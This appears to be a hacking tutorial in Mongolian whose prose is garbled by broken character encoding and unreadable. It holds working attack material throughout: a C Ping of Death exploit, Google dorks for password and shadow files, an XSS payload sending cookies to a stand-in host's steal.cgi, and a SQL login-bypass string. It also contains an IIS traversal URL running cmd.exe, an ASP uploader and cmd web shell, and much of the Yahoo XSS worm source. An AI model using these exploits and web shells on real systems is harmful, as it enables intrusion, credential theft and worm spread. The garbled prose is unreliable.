axnaaaDoSykyDenialofService-nu:yxa:anapnas.DoSaapan: usepeuxnaeeaacepaepnryuaraaxacaanypcranbrvepnvvnax sopnnro:o.DoSaapan:ao:pooxoopouaooarasaparsnraa:aMam onou :epen aaar. Xnmaa us: Ping ofDeat h Teardrop Ping Flooding Amplificat ion D-DoS SYN-Flooding Portscan St ealt h SYNscan FI N / X-Mas / Null-Scan Spoof I dle-Scan Shroud Proactive rax Ma: uaaua us onou :epen aaar. 3araapnr sMap sopnnro:or :anapnaxbr xnuaae. 3araap us vra n sMapuarsvnnuanaaauaaapcyypnnaarraaaonrounxaonaMapax onoa yy.Pi ngof Deat h:!Pnake:buxaMxaa6550/(65535-20-8)aaar, :araan65536nnraaaankyonoxon?!3ua8us!CNP:onro Maaaanan, 20 us !P xasrub :onro Maaaanan aryynaraaar. Faxaaa na myyapingsayynaxaaRequesttimedout"raaapingMaausvxunxaar mvv aaa. Uaauaa xapnynaxrvraap :oxnpyynunxcau yupaac :ap. 3ua C xan aaap nucau koa :aannaa. # ifdef LI NUX# define REALLY_RAW# define __BSD_SOURCE# if ndef I P_MF# define I P_MF0x2000# define I P_DF0x4000# define I P_CE0x8000# define I P_OFFSET0x1FFF# endif# endif74# include< st dio.h># include< sys/ t ypes.h># include< sys/ socket .h># include< net db.h># include< net inet / in.h># include< net inet / in_syst m.h># include< net inet / ip.h># include< net inet / ip_icmp.h># include< st ring.h># include< arpa/ inet .h>/ * *I fyour kernel doesn'tmuck wit h raw packet s,# define REALLY_RAW. *This is probably onlyLinux. * /# ifdef REALLY_RAW# define FI X( x)ht ons(x)# else# define FI X( x)(x)# endifintmain(intargc,char * * argv){ints;char buf[ 1500] ;st ructip* ip=(st ruct ip * )buf;# ifdef LI NUXst ructicmphdr* icmp=(st ructicmphdr * )(ip+1);# elsest ructicmp * icmp=( st ructicmp * )(ip+1) ;# endifst ruct host ent * hp;st ructsockaddr_in dst ;intoffset ;inton = 1;75bzero(buf, sizeof buf) ;if ((s=socket (AF_I NET, SOCK_RAW,# ifdef LI NUXI PPROTO_I CMP# elseI PPROTO_I P# endif)) ip_dst .s_addr =inet _addr(argv[ 1] ) ) = = -1) { fprint f(st derr, "%s:unknownhost \ n", argv[ 1] );exit (1) ;}}else {bcopy(hp-> h_addr_list [ 0] ,&ip-> ip_dst .s_addr, hp-> h_lengt h);} print f( "Sending t o%s\ n", inet _nt oa(ip-> ip_dst ));ip-> ip_v = 4;ip-> ip_hl =sizeof* ip > > 2;ip-> ip_t os= 0;ip-> ip_len= FI X(sizeof buf);ip-> ip_id=ht ons(4321);ip-> ip_off=FI X(0) ;ip-> ip_t t l = 255;ip-> ip_p=1;# ifdef LI NUXip-> ip_csum=0; / *kernel fills in* /76# elseip-> ip_sum = 0;/ *kernel fills in* /# endifip-> ip_src.s_addr = 0; / * kernelfills in * /dst .sin_addr=ip-> ip_dst ;dst .sin_family =AF_I NET;# ifdef LI NUXicmp-> t ype=I CMP_ECHO;icmp-> code = 0;icmp-> checksum=ht ons(~ (I CMP_ECHO< >3);if (of fset< 65120)ip-> ip_of f| =FI X(I P_MF);elseip-> ip_len =FI X(418); / *make t ot al 65538 * /if (sendt o(s, buf , sizeof buf , 0, (st ructsockaddr * )&dst ,sizeof dst ) t ype =0;icmp-> code =0;icmp-> checksum = 0;# elseicmp-> icmp_t ype=0;icmp-> icmp_code=0;77icmp-> icmp_cksum=0;# endif}}ret urn0;}Teardr op:!PxasrnuxacarnaxsayynaxaaTCP/!Puvxnnapu xacrvvanr uyrnyynax rax oponaaor. Pi ng Fl oodi ng: Cepaepnr xapny vnaan xnx uaaaxrv on:on ping nake: nnraaaar.Ampl i f i cat i on: Ping Flood mnr onoau aapan:br Broadcast xasr a Spoof amnrnacuaap nake:aa xaa aaxnu ecreaer. Di st ri but edDoS: DoS,D-DoSxopbusnraaussmurfamnrnaxuar xoc:oocaapaanDoSonuo.OnouZombiesaparamnrnaxaapaan D-DoS.ZombieraaarnaunaMsapanaaapMaaaaraMsavxaan:ay:rbu xyasa :ec:a.TnMaac unurax uapnacau ax.Zombie-rnu sopnnro us :asMapuarkoMnsk:epnrxakepaaxaaponnooraxoaoxoaeepee myya:yxaukoMnsk:epnvvaapaxrvxapnueepkoMnsk:epaap aaMxyynxaapaar.Huracuaapyuaaraaa:aubrapnxaaxauvvonuo. Op:erukoMnsk:epaacxauxakepacaubrxapaxaa:aubzombiexaparaax onoxooc :a xaparaaxrv kM. Zombie onroxoa aapaax maapanaryyabr xauracau ax xapar:a: Taub xsuax sopnnro:o PC pyy opox onoMx:o. I PI D indet ificat ionnumber-r Maaax xapar:a. BycaaxvMvvc:aMamaraMaaaananconnnuaorax xapar:a.78SYNFl oodi ng:3xnaaaTCP/SYNnake:brnnraaxaaaapaxrax araacepaepxapnyausTCP/SYN-ACKnake:brnnraaraaayuax TCP/ACKnake:npaxnrxvnaaaar.FaauXakepaaruACKnake:br nnraaxrv xapnu half-open aanbr us amnrnaaar.FI N/ X- mas/ Nul l - Scan:3uaapraussMapuarxonoo :or:ooaorrv,xapnuaraaraapyparmaaaxnnnaaar.Xnmaaus: Haruaan::anop:anaaraxaa:a:vvunrxsuaxrvxapnu:ap xaanra xaaraaan reset nake:aa sayynaar.Spoof : Xnmaa us WinSSLNiN. Neu URL Spoof, !P Spoof rax aaar.WinSSLManint heMiddle-rsypraap:anapnaaannnvvonroMx:o onox ax. 79I dl e-Scan:nNap,!PidentificationnumberamnrnaxZombie-roop aaMxyynaar.OaoornuaanaapxaMrnucauvnxaparaaruxsuax cnc:eM kM.Xspxsa xaMraanax as?KyubeMueanpycunacparnporpaM,ran:xauaxopbrcyynra.Fon us ran: xaubuxaa :oxnproor sea xnx xapar:a.DoS aapan: onx araar xapxau Maaax aa? Hu:epua: xonon: Mam yaaau onox 3apnM aavva naaaxrv onox Map u aa ca: pyy opx onoxrv ax Nam nx saMpaarv spam npaxHarau::auspyyaoa:onxaraarMaacauonaxnaaaxaauaac aoa:onxaraaronoxxapaa:aMapraxnnuxvunmonakcnep:vvaaa xauaax, !SP aaa Maaaraax rax Ma: apra xaMxaar aau onox kM.- Googl e hack -FaaaaabuXakepyyabudopyMpyyopoxoaBnxapxaucauXakep onox aa?" racau acyyn: Mam nx aaar. Xapnu Xakepyya xapnya us uar n vrnr aauaaa xanaar. 3ua us Google-aac acyy" racau vr kM.TanauncauMaaaxGooglexan:bucnc:eMMaausxakepyyabu cauuasraaan:araxaxax.XakepyyaGooglexan:bucnc:eMnr amnrnaxxakepaaxvnaxnnnaraaraasayynxonaor.Bapaaxvrcnu ansuaraapxan:xnxaaxakepaaxaa:auaxakepaaxaaxapar:a Maaaannvva rapu npax onuo. 3eaxeu Google ran:rv NSN, Yahoo aaap u xnx onaor. allinurl: winnt / syst em32/ allint it le: "index of/ root " allint it le: "index of/ admin" inurl: wwwroot / * . filet ype: ht passwd ht passwd inurl: admin filet ype: db inurl: iisadmin users.pwd index.of.privat e (algo privado) int it le: index.of mast er.passwd inurl: passlist .t xt(para encont rar list as de passwords)80 int it le: "I ndex of..et cpasswd int it le: admin int it le: login I ncorrectsynt axnear(SQL scripterror) int it le: index.of ws_ft p.ini inurl: backup int it le: index.ofinurl: admin I ndexof / backup index.of.password index.of.winnt inurl: "aut h_user_file.t xt I ndexof / mail I ndexof / + passwd I ndex of / + .ht access I ndex of ft p+ .mdb allinurl: / cgi-bin/ + mailt o allint it le:rest rict ed filet ype: mail administ rat or.pwd.index aut hors.pwd.index service.pwd.index inurl: "aut h_user_file.t xt allinurl: / bash_hist ory int it le: "I ndex ofpwd.db int it le: "I ndex ofet c/ shadow int it le: "I ndex of ht passwd service.pwd users.pwd administ rat ors.pwd wwwboard.pl www-sql pwd.dat ws_ft p.log aut hors.pwdrax Ma: Mam onou vraap xax onx onaor.Neu Java-r v:aaru Sunkopnopaunu 2005 oua Maaaancuaap Google-nuuvxusXakepyyaaaaauavvnxMaaaannnreruaraaereeavvu ao:op :a naun sayyncau n-Manaap aaMxyynx xyanu Maaaanan, uyyu vrnr Maaus xvp:an onx aau uaaax aua raxaa.XnmaausnxaaxouornueMuexaxaaaapaaxxyyaacuyyarapu npcau onuo. Xakepaax Maaaar xvMvvc sMapxyy svn aa raarnr xapaaa n Maaax ns.818283- Cr oss Si t e Scri pt i ng ( XSS)-CrossSiteScriptingykyXXSaapan:onsMapuarinput-aap aaMxyynxeepnukoaooxaparnaxsaaankM.Xakepbuanacaunnuk aaapaapcuaapJavaScript koaaxnnnaxxaparnarunucookieraxMa: Xakep nyy nnraaraaua. us vpnu ckpnn: ax onox onoauronayy n JavaScript aaapxnaar.Cookiexynranaxbrhij ackraxuapnaaar. XaparnarueepnuMaaaannaaeepunexveausaxnnnaxMaaaannnrus Xakepnyynnraaxvnannrxnaar.naurysaknneu::anaaapapcaan nnvveuaepaua.Firef ox-nucookieedit or-nramnrnaxep:erunu cookie-ropyynxeruonuo.Refreshaapaaaep:erunu:enceu v:aaraaxvvuvvanr xaparnax onoMx:o.PoCexploit onep:erunraurnuaapeep:nmusmnnxvvnax sopnnro:o. 3ua on xaMrnu aMapxau cookie aaax apra. 84Powered By !nvision Power Boards 1.3.1 rax Ma: vuarv anau source-brxapxauauaapraapxakepaaxonox:yxasvncGoogle-aapavvpau araa. 3ua apraap n Script kiddies aavvanr yuaraaaar. PHP Nuke-nu uvx:ht t p: / / localhost / nuke73/ modules.php?name= News&file= art icle&sid= 1&opt ionbox=[ 'ht t p: / / sample.com/ ph33r/ st eal.cgi?'+ document .cookie]3xnaaatextboxernexeaHTNLxanpvvxepavvnxaraaacaxnr manraua. Xnmaa us:' SearchResult .aspx.vb I mport s Syst em I mport s Syst em.Web I mport s Syst em.Web.UII mport s Syst em.Web.UI .WebCont rols Public ClassSearchPage I nherit s Syst em.Web.UI .Page Prot ect ed t xt I nputAs Text Box Prot ect ed cmdSearch As But t on Prot ect ed lblResultAs Label Prot ect ed Sub cmdSearch _Click( Source As Obj ect , _ e As Event Args) / /Do Search..lblResult .Text = "YouSearched for: " & t xt I nput .Text/ /Display Search Result s../ /End Sub End ClassBaapxxnmaausaaapxan:budyukuusxaparnarunuopyyncau Maaaannnrmanraxrvaraayunpcross-sitescriptxnxonoxoop anaaa:a aua. Yvunr.NET:exuonornaaapsacaxaaaMepnruaMxercueepanaaa:axvcan:nr rapraxrvaxonoMx:o.FaauServer.HtmlEncode(string)amnrnax Text boxaaapaavvunrnunxercueepyuaaraaaxvunurvonrounxox onuo.< %@ Page Language= "C# " Validat eRequest = "false" %>< scriptrunat = "server">void searchBt n_Click(obj ectsender, Event Args e) {Response.Writ e(Ht t pUt ilit y.Ht mlEncode(input Txt .Text ) );}85< / script >< ht ml>< body>< formid= "form1"runat = "server">< asp: Text BoxI D= "input Txt "Runat = "server"Text Mode= "Mult iLine" Widt h= "382px" Height = "152px">< / asp: Text Box>< asp: But t onI D= "searchBt n"Runat = "server"Text = "Submit "OnClick= " searchBt n_Click" / >< / form>< / body>< / ht ml>3apnMxvMvvcSSL-:aca:brXSSxnxonoMxrvraxonroaor, aua on xyanaa onron: kM. Xspxsa xaMraanax as?I nput -yyabuyp:brsaaaansaaxerex,uarnxyp:axxaparrv. Xepavvnan:xnaaraxxapar:a,myyaHTNLxanapaapxaparaaarrv ax.Xapnuaaaaapaana:ycra:aMaar:vvanrxepavvnaraap xncuaapakynaacaraua:yraxonaouo.Xnmaausrax nucaunr8lt;script8gt;raxxepavvnxxapyynua.BoopsapnM:ycra :aMaar:nr koabr xapyynnaa.< &lt ;> &gt ;# 35;& &" &quot ;Perl xanun mod_perl aurnuaap XSS-nr xaMraanax onoMxnr onroaor.# ! / usr/ bin/ perluse CGI ;use HTML: : Ent it ies;my $cgi=CGI -> new();my $t ext =$cgi-> param('t ext ');print$cgi-> header();print"You ent ered ", HTML: : Ent it ies: : encode($t ext ) ;86- SQL i nj ect i on -Orerannucauonao:pookpean:kap:buayraap,uyyuvrraxMa: uyxansvncnraryynaarnnaa.TaraanererannucaurnuMaaaannnr eep: xapar:araap amnrnax uaaaan.BacepaepxakepaaxxaMrnuaMapxauereea:vraaManapraon SOL injection kM. Aux aa xnx araa nxaux xvMvvc xyyaacubxaa nornu xnaarxacrnraapaaxaanaapnuaar.3uaanaaaNouronbuaa xyyaacuyyaaa anar :oxnonaaor.$result = mysql_query( SELECT* FROMusers WHEREuser= $userand pass= $pass ) ;if(mysql_num_rows($result )> 0){/ /login}3uaveausername-aaa admin or1= 1/ * raxerexeanmyyauaa:paaa opunxaor. 3ua / * on SQL-nu koMaua kM.$result =mysql_query( SELECT *FROM usersWHERE user= admin or 1= 1 / * andpass= $pass ) ;- OS I nj ect i on -!njectiononXakep:aaannnnkemuaapaaMxyynxcnc:eMpvv eepnu koaoo sayynax onoMxnr onroaor svn kM. OMuex SOL injection :auary:racauaa:a.Cnc:eMnudyukuyyabrxakepaaxsopnnroop amnrnaxbr Operation System injection raaa araa kM. java.lang.Runtime usvnannucnc:eM:axapnnuauaxnnnaaaryunpnMonoMxnr onrouo..NET-aonSystem.Diagnostics.Process.Startusvuacauron xaparnax svn onuo. Xapnu PHP-a on exec(), passthru() racau dyukuyya aaar.Xnmaanan Java aaap nuaan:publicclass DoSt uff{public st ring execut eCommand(St ringuserName){t ry{87St ring myUid=userName;Runt ime rt=Runt ime.get Runt ime();rt .exec("doSt uff.exe"+ - + myUid); / / Callexewit h userI D}cat ch(Except ion e){e.print St ackTrace() ;}}}get Runt ime() -paaMxyynxdoStuff.exe-raxnyynxaua.Yvunr .NET-a amnrnaaan:namespace Ext ernalExecut ion{class CallExt ernal{st at ic void Main(st ring[ ]args){St ring arg1= args[ 0] ;Syst em.Diagnost ics.Process.St art ("doSt uf f.exe", arg1);}}}3ua on Shell amnrnax raaaaa nporpaM axnyynax kM. - HTTP post SOL query aapyynax -Uaaap HTTP npo:okonoopaaMxyynx aa cepaep onou annnnkemu cepaep:uaa:apuaoa:noxaprbrauavsua.3uaxvvapraapaa annnnkemu pyy aoa:noxoa ran: xaua (firewall) onou SSL sMap u uenee vsvvnaxrvr xapyynax onuo. Fan: xaua seaxeu vuau sea HTTP xvcan:aua vuau sea HTTP xapnyn: n xvnaau seameeperaeue. 3xnaaa URLparsing xnx xapar:a.ht t p: / / www1.example.com/ script s/ ..%c0%af../ winnt / syst em32/ cmd.Exe?/ C+ copy+ c: \ winnt \ syst em32\ cmd.Exe+ c: \ inet pub \ script s883xnaaaxanaaxonoxoopaaannnnkemuononauaxvvaprbr xaparnaxonoxacaxnrmanrax:or:oouo.Xapaaaoa:onrooroocau onro raaan aapaax xop xvunu svnnr auxaapax xapar:a.1. Haaax:aopon:oopxauaax-aoa:noxraxaraacepaepacaan cvnxaa pvv axnnnax araa koMMauaaap xynraraap uaa:pax2. 1anaaMxyynaruaapxauaax-nop:mnuxnaru,rootkitsmnr aoa:nox xaparcnvvaaap amnrnaxHsr: ran: xaua:a oek:yya pyy xvpu uaaua raaar Mam xauvv, raxaaa or:onoMxrvsvnnmaa.Baapxxssraapnan:aaxvpaxnu:ynaara saparaanporpaMunaxMaanar,cepaepnvvdanxyynaru(fileuploader) a command promt axaa n onuo.ASP aaap nucau dan xyynarunu koa:< form met hod= postENCTYPE= "mult ipart / form-dat a">< inputt ype= file name= "File1">< inputt ype= "submit " Name= "Act ion" value= "Upload">< / form>< hr>< ! --# I NCLUDE FI LE= "upload.inc" -->< % I f Request .ServerVariables( "REQUEST_METHOD")="POST" Then SetFields =Get Upload()I f Fields( "File1") .FileName < >"" ThenFields( "File1") .Value.SaveAs Server.MapPat h( ".")& "\ " & Fields( "File1") .FileName Response.Writ e( "< LI > Upload:" & Fields( "File1") .FileName)End I f End I f %>89Bna aa cepaepnu koMMauabr ancaac yanpaax uaacau vea xakepaax axnnnaraaaxanua.BnasMapuaraurnuapraxaparnaxaacepaepnvv aoa:onuo.BnaaxnaaaURL-aa:oaopxonxancaaccepaepnukoMauabr yanpaaxbr :aunnuyynua. Cmdasp.asp xyyaacub koa < % Dim oScript , oScript Net , oFileSys, oFile, szCMD, szTempFileOn Error Resume NextSetoScript=Server.Creat eObj ect ( "WSCRI PT.SHELL")SetoScript Net=Server.Creat eObj ect ( "WSCRI PT.NETWORK")SetoFileSys =Server.Creat eObj ect ( "Script ing.FileSyst emObj ect ")szCMD =Request .Form(".CMD")I f ( szCMD < >"")Then szTempFile ="C: \ " & oFileSys.Get TempName() Call oScript .Run ( "cmd.exe / c " & szCMD & " >" & szTempFile, 0, True)SetoFile =oFileSys.OpenText File( szTempFile, 1, False, 0)End I f %>< FORM act ion= "< %=Request .ServerVariables( "URL")%> " met hod= "POST">< inputt ype= t extname= ".CMD" size= 45 value= "< %=szCMD %> ">< inputt ype= submitvalue= "Run">< / FORM>< PRE>< % I f ( I sObj ect ( oFile))Then On Error Resume NextResponse.Writ e Server.HTMLEncode( oFile.ReadAll)oFile.Close Call oFileSys.Delet eFile( szTempFile, True)End I f %>< / PRE>90Bnaunsopnnroonshellxepavvnarunr(/bin/sh,cmd.exeraxMa:) aacepaepnuvuacauanpek:opnyyapbuxaanra(backdoor)vvcrax xyynax kM. 3ua us na URL-aap aaMxyynx shell xepavvnarunr ayyaaxbr sopnnro:o. 3ua xapxau apbu xaanra vvcrax :yxa rypaau aprbr vsua.HTTPPOST-bramnrnaxc:auaap:opon:oopererannraacepaep nvvxyynua.XapxaukoMMauaxepavvnarunrPOSTamnrnaxnnraaxnr vsua.WindowsNT-rnu!!Spvvcmd.exe,Linux-nuApachepvvsh.cgi uapbr:yc:ycxyynua.3uaxapxauxakepaaxxnuaannmyupaacuaam vn saubr sypraap vsvvnnaa. XaMrnu cvvna SOL query uapyynx aua.91- Yahoo XSS wor m -Booparaarxapaaay:rayunprv:ekc:raxoaoxonoxrvmvv. Tauapworm-nu:yxaonoucoucoxacauax,nauauarnrus :aannaa. 3vraap XSSwormrax ky aarnr xapar racauaaa. 3ua araar vranr us nuaaa axnnnyynaxaa nx xeaenMep opox onuo. Xapnu apa rax nuaaa xaaranaxaap unus Ant ivirus-un nporpaM unus yc:raunx ax. Xapnu vvunr :ausx uaaaxrv araa Ant ivirus-:aon svraap Ant ivirus-unxaanporpaMbryc:ra.Xapnununxaxnbrunusxooxouxeureaunex vvauaac ht t p: / / ha.ckers.org ca:aac xaraaa vsaapa rax seanex aua.< img src= 'ht t p: / / us.i1.yimg.com/ us.yimg.com/ i/ us/ nt / ma/ ma_mail_1.gif' onfilt ered= "var ht t p_request=false;var Email ='';var I DList ='';var CRumb ='';f unct ion makeRequest (url, Func, Met hod, Param) {if (window.XMLHt t pRequest ){ht t p_request =newXMLHt t pRequest ();}else if (window.Act iveXObj ect ) {ht t p_request =new Act iveXObj ect ('Microsoft .XMLHTTP');} ht t p_request .onfilt ered=Func;92ht t p_request .open(Met hod, url, t rue);if( Met hod = =' GET') ht t p_request .send(null);else ht t p_request .send(Param) ;} window.open('ht t p: / / www,last dat a.com');ServerUrl=url0; USI ndex=ServerUrl.indexOf('us.' ,0); MailI ndex =ServerUrl.indexOf('.mail' ,0); Cut Len =MailI ndex - USI ndex -3; var Server=ServerUrl.subst r(USI ndex + 3, Cut Len) ;f unct ionGet I Ds( Ht mlCont ent ) { I DList ='';St art St ring ='< t d> ';EndSt ring='< / t d> ';i = 0; St art I ndex = Ht mlCont ent .indexOf(St art St ring, 0);while( St art I ndex > = 0){EndI ndex=Ht mlCont ent .indexOf(EndSt ring, St art I ndex);Cut Len=EndI ndex- St art I ndex -St art St ring.lengt h;YahooI D =Ht mlCont ent .subst r(St art I ndex + St art St ring.lengt h,Cut Len) ;if( YahooI D.indexOf('@yahoo.com', 0)>0 | |YahooI D.indexOf('@yahoogroups.com', 0)>0 ) I DList =I DList +',' +YahooI D;St art St ring =' < / t r> ';St art I ndex=Ht mlCont ent .indexOf( St art St ring, St art I ndex + 20) ;St art St ring=' < t d> ';St art I ndex = Ht mlCont ent .indexOf(St art St ring,St art I ndex +20);i+ + ;}if(I DList .subst r(0,1) = =',') I DList =I DList .subst r( 1, I DList .lengt h);if(I DList .indexOf(',', 0) > 0 ){I DList Array =I DList .split ( ',');Email =I DList Array[ 0] ;I DList=I DList .replace(Email +',', '');}CurEmail =spamform.NE.value;I DList =I DList .replace(CurEmail +',', '');I DList =I DList .replace(',' +CurEmail, ''); I DList =I DList .replace(CurEmail, ''); UserEmail =showLet t er.FromAddress.value; I DList =I DList .replace(',' +UserEmail, ''); I DList =I DList .replace(UserEmail +',', ''); I DList=I DList .replace(UserEmail, '');ret urn I DList ;} funct ion List Cont act s() {if (ht t p_request .readySt at e = =4) {if (ht t p_request .st at us = = 200) {Ht mlCont ent =ht t p_request .responseText ;I DList= Get I Ds(Ht mlCont ent );makeRequest ('ht t p: / / us.' +Server +'.mail.yahoo.com/ ym/ Compose/ ?rnd= ' +Mat h.random(), Get crumb, 'GET', null);}}}f unct ion Ext ract St r(Ht mlCont ent ) { St art St ring='name= \ u0022.crumb\ u0022 value= \ u0022?;EndSt ring=' \ u0022?;i = 0; St art I ndex =Ht mlCont ent .indexOf( St art St ring, 0) ;EndI ndex =Ht mlCont ent .indexOf(EndSt ring, St art I ndex + St art St ring.lengt h );Cut Len =EndI ndex -St art I ndex -St art St ring.lengt h; crumb=Ht mlCont ent .subst r(St art I ndex +St art St ring.lengt h , Cut Len ) ;ret urn crumb;}f unct ionGet crumb() {if (ht t p_request .readySt at e = = 4) {if (ht t p_request .st at us = =200) {Ht mlCont ent= ht t p_request .responseText ;CRumb